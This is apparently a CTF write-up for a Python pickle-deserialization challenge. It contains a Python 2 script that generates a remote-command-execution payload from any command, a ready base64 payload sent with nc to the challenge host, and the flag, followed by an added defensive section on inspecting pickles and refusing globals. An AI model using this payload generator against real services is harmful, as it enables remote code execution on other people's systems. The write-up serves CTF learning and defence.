Python Auth 2 - 100 Points

nc target.netsec.gemastik.ui.ac.id 60001

POC

In Python Auth 2, our input is passed into pickle, which can lead to Remote Command Execution.

We can generate an RCE pickle payload using the following script:

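# Python 2 script (cPickle module, print statement)
import cPickle
import os
import sys
import base64

# Command to embed; can be overridden with the first command-line argument
DEFAULT_COMMAND = "cat flag.txt"
COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND

class PickleRce(object):
    # __reduce__ tells pickle how to rebuild the object: the unpickler
    # calls the returned callable with the returned argument tuple
    def __reduce__(self):
        return (os.system, (COMMAND,))

# Serialize the object and base64-encode it for the service
print base64.b64encode(cPickle.dumps(PickleRce()))

Send the generated payload to the service:

echo "Y3Bvc2l4CnN5c3RlbQpwMQooUydjYXQgZmxhZy50eHQnCnAyCnRScDMKLg==" | nc target.netsec.gemastik.ui.ac.id 60003
GEMASTIK{serialization_attack_is_popular_nowadays}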

Flag: GEMASTIK{serialization_attack_is_popular_nowadays}
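
The root cause above is a service that unpickles untrusted input. The following is an added example, not part of the original write-up: a Python 3 sketch that inspects the write-up's payload without executing it and loads pickles through an unpickler that refuses all global lookups. The names scan_pickle, DenyGlobalsUnpickler and safe_loads are illustrative assumptions.

```python
import base64
import io
import pickle
import pickletools

# Payload string exactly as it appears in the write-up (protocol 0, base64).
PAGE_PAYLOAD = "Y3Bvc2l4CnN5c3RlbQpwMQooUydjYXQgZmxhZy50eHQnCnAyCnRScDMKLg=="

# Opcodes that import a name, and opcodes that call or construct an object.
IMPORT_OPS = {"GLOBAL", "STACK_GLOBAL", "INST"}
CALL_OPS = {"REDUCE", "OBJ", "NEWOBJ", "NEWOBJ_EX", "BUILD"}


def scan_pickle(data):
    """Walk the opcode stream without executing it; return (imports, calls)."""
    imports, calls = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in IMPORT_OPS:
            # STACK_GLOBAL takes its module and name from the stack (arg is None).
            imports.append(arg if arg is not None else "<from stack>")
        elif opcode.name in CALL_OPS:
            calls.append(opcode.name)
    return imports, calls


class DenyGlobalsUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global lookup, so only plain data loads."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError("global %s.%s is forbidden" % (module, name))


def safe_loads(data):
    """Deserialize data, rejecting any pickle that references a global."""
    return DenyGlobalsUnpickler(io.BytesIO(data)).load()


if __name__ == "__main__":
    raw = base64.b64decode(PAGE_PAYLOAD)
    print(scan_pickle(raw))          # imports and call opcodes found
    try:
        safe_loads(raw)
    except pickle.UnpicklingError as exc:
        print("rejected:", exc)
    # Constructed benign sample: plain data still round-trips.
    print(safe_loads(pickle.dumps({"user": "alice", "admin": False})))
```

For data that crosses a trust boundary, a format that cannot encode callables (for example JSON) removes this class of bug entirely; the deny-all unpickler is a fallback when pickle cannot be replaced.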
